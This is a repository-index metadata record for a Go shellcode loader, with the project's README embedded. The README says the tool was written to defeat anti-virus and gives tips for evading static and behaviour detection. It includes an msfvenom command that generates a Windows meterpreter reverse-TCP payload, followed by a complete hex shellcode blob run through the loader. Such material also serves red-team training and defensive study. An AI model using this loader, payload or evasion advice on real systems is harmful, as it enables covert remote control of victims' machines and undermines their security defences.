{"id":13509751,"url":"https://github.com/brimstone/go-shellcode","last_synced_at":"2025-04-04T08:09:10.632Z","repository":{"id":46150729,"uuid":"135365301","full_name":"brimstone/go-shellcode","owner":"brimstone","description":"Load shellcode into a new process","archived":false,"fork":false,"pushed_at":"2021-06-02T12:52:41.000Z","size":12,"stargazers_count":770,"open_issues_count":0,"forks_count":124,"subscribers_count":19,"default_branch":"master","last_synced_at":"2025-03-28T07:08:55.284Z","etag":null,"topics":["go","post-exploitation","redteam","shellcode","windows"],"latest_commit_sha":null,"homepage":"","language":"Go","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/brimstone.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":".github/FUNDING.yml","license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null},"funding":{"github":"brimstone","patreon":null,"open_collective":null,"ko_fi":null,"tidelift":null,"community_bridge":null,"liberapay":null,"issuehunt":null,"otechie":null,"custom":null}},"created_at":"2018-05-30T00:02:38.000Z","updated_at":"2025-03-26T16:29:23.000Z","dependencies_parsed_at":"2022-08-12T12:40:48.223Z","dependency_job_id":null,"html_url":"https://github.com/brimstone/go-shellcode","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/brimstone%2Fgo-shellcode","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/brimstone%2Fgo-shellcode/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/brimstone%2Fgo-shellcode/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/brimstone%2Fgo-shellcode/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/brimstone","download_url":"https://codeload.github.com/brimstone/go-shellcode/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":247142074,"owners_count":20890653,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["go","post-exploitation","redteam","shellcode","windows"],"created_at":"2024-08-01T02:01:12.384Z","updated_at":"2025-04-04T08:09:10.606Z","avatar_url":"https://github.com/brimstone.png","language":"Go","readme":"shellcode\n=========\n\nThis is a program to run shellcode as its own process, all from memory. This was\nwritten to defeat anti-virus detection. This is now getting detected as\nVirTool:Win32/Shrine.A. Use a tool like [garble](https://github.com/burrowers/garble)\nto obfuscate the binary to defeat static analysis. Change the code yourself to\ndefeat behavior analysis.\n\nUsage\n=====\n\nKeep in mind that only 64bit shellcode will run in a 64bit process. This can't\nautodetect your shellcode architecture.\n\nUse msfvenom or metasploit to generate a bit of shellcode as hex format:\n```\n$ msfvenom -p windows/meterpreter/reverse_tcp -f hex -o rev.hex LHOST=127.0.0.1 LPORT=4444\n```\n\n```\nc:\\windows\\temp\u003esc.exe fce8820000006089e531c0648b50308b520c8b52148b72280fb74a2631ffac3c617c022c20c1cf0d01c7e2f252578b52108b4a3c8b4c1178e34801d1518b592001d38b4918e33a498b348b01d631ffacc1cf0d01c738e075f6037df83b7d2475e4588b582401d3668b0c4b8b581c01d38b048b01d0894424245b5b61595a51ffe05f5f5a8b12eb8d5d6833320000687773325f54684c77260789e8ffd0b89001000029c454506829806b00ffd56a0a687f000001680200115c89e6505050504050405068ea0fdfe0ffd5976a1056576899a57461ffd585c0740aff4e0875ece8670000006a006a0456576802d9c85fffd583f8007e368b366a406800100000566a006858a453e5ffd593536a005653576802d9c85fffd583f8007d285868004000006a0050680b2f0f30ffd55768756e4d61ffd55e5eff0c240f8570ffffffe99bffffff01c329c675c1c3bbf0b5a2566a0053ffd5\n```\n\nSometimes the shellcode is larger than the limit of a command line with\narguments. Try putting the whole thing in a batch script instead.\n\nBuild\n=====\n\nStandard go building steps. Set GOOS to `windows` and GOARCH to the same as your\nshellcode, either `386` or `amd64`. This can't detect the architecture of your\nshellcode.\n\nThe resulting binary is a little big, 2.1M, but compresses well with UPX,\nroughly 508K.\n","funding_links":["https://github.com/sponsors/brimstone"],"categories":["Go","Repositories","windows"],"sub_categories":[],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fbrimstone%2Fgo-shellcode","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fbrimstone%2Fgo-shellcode","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fbrimstone%2Fgo-shellcode/lists"}